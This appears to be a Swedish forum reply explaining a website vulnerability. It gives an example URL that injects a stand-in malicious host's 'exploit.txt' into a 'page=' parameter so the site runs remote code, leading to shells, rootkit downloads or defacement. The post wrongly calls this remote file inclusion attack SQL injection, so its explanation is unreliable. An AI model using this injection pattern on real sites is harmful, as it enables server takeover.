nej, en sql injection beöver inte ha något med mysql att göra, eller det har inte det.
Det utnyttjar hål i en hemsida.
Så att om vi tex säger att det är ett hål på hemsidan.
Den ser ut såhär när man bläddrar mellan olika sidor: <a class="postlink" href="
http://www.hemsidan.com/index.php?page= ... ?page=1</a>
Men kolla, då kan det ju vara en möjlighet för en exploit där.
<a class="postlink" href="
http://www.hemsidan.com/index.php?page= ... e=</a>[b]1[/b] där.
om vi nu har skadlig kod på, låt oss säga <a class="postlink" href="
http://www.skadligsida.com/exploit.txt" ... oit.txt</a>
Om nu hemsidan har ett hål så kan man göra såhär:
"
www.hemsidan.com/index.php?page=www.ska ... xploit.txt"
nu så startar all skadbar kod, som tex kan vara skriven i php i "
www.hemsidan.com"
Då kan man få upp tex en ftp klient, kommandoskal, wget och allt som hör till, har man en ösäker server som man inte har koll på rättigheterna med så kan man till tom ladda ner virus/rootkits och andra potentiellt skadlig kod, man även gära en "deface" (om det nu heter så, kommer inte ihåg) men det var tydligen den sortens sql som de försökte göra.
Du kan läsa med om sql injections och sånt här
http://en.wikipedia.org/wiki/SQL_injection bland annat.
Edit: kan fått det där med sql om bakfoten, men jag tror att jag fått det rätt, så mycket termer å sånt att hålla reda på
Stationär: p4@2.4ghz, 512MB DDR, nvidia 7600gs | Laptop: intel c2d@1.5ghz 1gb DDR2 | Mediacenter: p4@3ghz, 1gb ram, nvidia 6100LE | Server: p3@550mhz, 512mb ram, 420gb hd.
